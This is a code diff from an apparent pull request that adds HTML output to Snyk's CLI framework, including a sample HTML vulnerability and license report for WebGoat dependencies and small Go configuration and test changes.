+      <div class="issue-description"><h2>Overview</h2><p><a href="https://mvnrepository.com/artifact/org.apache.tomcat.embed/tomcat-embed-core" target="_blank" rel="noopener noreferrer">org.apache.tomcat.embed:tomcat-embed-core</a> is a Core Tomcat implementation.</p><p>Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the delayed cleaning of multipart upload temporary files. An attacker can cause a denial-of-service by sending crafted requests that create temporary copies of uploaded parts faster than the garbage collector clears them, leading to resource exhaustion.</p><p><strong>Note:</strong> Successful exploitation depends on the JVM settings, the application memory usage, and application load.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>org.apache.tomcat.embed:tomcat-embed-core</code> to version 9.0.110, 10.1.47, 11.0.12 or higher.</p><h2>References</h2><ul><li><a href="https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp" target="_blank" rel="noopener noreferrer">Apache Mail</a></li><li><a href="https://github.com/apache/tomcat/commit/1cdf5f730ede75a0759492f179ac21ca4ff68e06" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/apache/tomcat/commit/af6e9181620304c0d818121c29c074e1330610d0" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/apache/tomcat/commit/afa422bd7ca1eef0f507259c682fd876494d9c3b" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2406588" target="_blank" rel="noopener noreferrer">Red Hat Bugzilla Bug</a></li><li><a href="https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.12" target="_blank" rel="noopener noreferrer">Vulnerability Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCATEMBED-13723930" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> December 12, 2026</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> November 11, 2025</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> False positive</div>
+  </div>
+</div>
+    </details>
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open License Issues (4)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)</li>
+      <li class="card-meta-item">License</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.github.jnr:jnr-posix@3.1.20</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.asciidoctor:asciidoctorj@3.0.0 &#x203A; org.jruby:jruby@10.0.0.1 &#x203A; org.jruby:jruby-base@10.0.0.1 &#x203A; com.github.jnr:jnr-posix@3.1.20</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/snyk:lic:maven:com.github.jnr:jnr-posix:%28EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1%29" target="_blank" rel="noopener noreferrer">More about this license issue</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Dual license: EPL-1.0, LGPL-2.1</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)</li>
+      <li class="card-meta-item">License</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> ch.qos.logback:logback-classic@1.5.18</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-validation@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter-logging@3.5.6 &#x203A; ch.qos.logback:logback-classic@1.5.18</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><p>Dual license: EPL-1.0, LGPL-2.1</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/snyk:lic:maven:ch.qos.logback:logback-classic:%28EPL-1.0_OR_LGPL-2.1%29" target="_blank" rel="noopener noreferrer">More about this license issue</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Dual license: EPL-1.0, LGPL-2.1</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)</li>
+      <li class="card-meta-item">License</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> ch.qos.logback:logback-core@1.5.18</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-validation@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter-logging@3.5.6 &#x203A; ch.qos.logback:logback-classic@1.5.18 &#x203A; ch.qos.logback:logback-core@1.5.18</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><p>Dual license: EPL-1.0, LGPL-2.1</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/snyk:lic:maven:ch.qos.logback:logback-core:%28EPL-1.0_OR_LGPL-2.1%29" target="_blank" rel="noopener noreferrer">More about this license issue</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>LGPL-2.1 license</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1</li>
+      <li class="card-meta-item">License</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.hibernate.orm:hibernate-core@6.6.29.Final</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-data-jpa@3.5.6 &#x203A; org.hibernate.orm:hibernate-core@6.6.29.Final</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><p>LGPL-2.1 license</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1" target="_blank" rel="noopener noreferrer">More about this license issue</a></div>
+  </div>
+</div>
+    </details>
+    <details class="finding-type-section">
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Ignored License Issues (1)</h2></summary>
+      <div class="issue-card severity--medium ignored">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>LGPL-2.1 license</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1</li>
+      <li class="card-meta-item">License</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.hibernate.common:hibernate-commons-annotations@7.0.3.Final</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-data-jpa@3.5.6 &#x203A; org.hibernate.orm:hibernate-core@6.6.29.Final &#x203A; org.hibernate.common:hibernate-commons-annotations@7.0.3.Final</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><p>LGPL-2.1 license</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1" target="_blank" rel="noopener noreferrer">More about this license issue</a></div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> Does not expire</div>
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> not-vulnerable</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> November 19, 2025</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> Catalin</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> License issue</div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/pkg/local_workflows/output_workflow.go
+++ b/pkg/local_workflows/output_workflow.go
@@ -24,6 +24,8 @@ func InitOutputWorkflow(engine workflow.Engine) error {
 	outputConfig.String(output_workflow.OUTPUT_CONFIG_KEY_JSON_FILE, "", "Write json output to file")
 	outputConfig.Bool(output_workflow.OUTPUT_CONFIG_KEY_SARIF, false, "Print sarif output to console")
 	outputConfig.String(output_workflow.OUTPUT_CONFIG_KEY_SARIF_FILE, "", "Write sarif output to file")
+	outputConfig.Bool(output_workflow.OUTPUT_CONFIG_KEY_HTML, false, "Print html output to console")
+	outputConfig.String(output_workflow.OUTPUT_CONFIG_KEY_HTML_FILE, "", "Write html output to file")
 	outputConfig.Bool(configuration.FLAG_INCLUDE_IGNORES, false, "Include ignored findings in the output")
 	outputConfig.String(configuration.FLAG_SEVERITY_THRESHOLD, "low", "Severity threshold for findings to be included in the output")
 

--- a/pkg/local_workflows/output_workflow_test.go
+++ b/pkg/local_workflows/output_workflow_test.go
@@ -139,6 +139,12 @@ func Test_Output_InitOutputWorkflow(t *testing.T) {
 
 	jsonFileOutput := config.Get("json-file-output")
 	assert.Equal(t, "", jsonFileOutput)
+
+	html := config.Get("html")
+	assert.Equal(t, false, html)
+
+	htmlFileOutput := config.Get("html-file-output")
+	assert.Equal(t, "", htmlFileOutput)
 }
 
 type testOutputDestination struct {


### PR DESCRIPTION
### Description

This is a first attempt to move html rendering into the CLI. It is currently based on a related effort to transform code test to UFM to unify rendering even more.

### Checklist

- [ ] Tests added and all succeed (`make test`)
- [ ] Regenerated mocks, etc. (`make generate`)
- [ ] Linted (`make lint`)
- [ ] Test your changes work for the CLI
  1. Clone / pull the latest [CLI](https://github.com/snyk/cli) main.
  2. Run `go get github.com/snyk/go-application-framework@YOUR_LATEST_GAF_COMMIT` in the `cliv2` directory.
      - Tip: for local testing, you can uncomment the line near the bottom of the CLI's [`go.mod`](https://github.com/snyk/cli/blob/main/cliv2/go.mod) to point to your local GAF code.
  3. Run `go mod tidy` in the `cliv2` directory.
  4. Run the CLI tests and do any required manual testing.
  5. Open a PR in the CLI repo **now** with the `go.mod` and `go.sum` changes.
  - Once this PR is merged, repeat these steps, but pointing to the latest GAF commit on main and update your CLI PR.
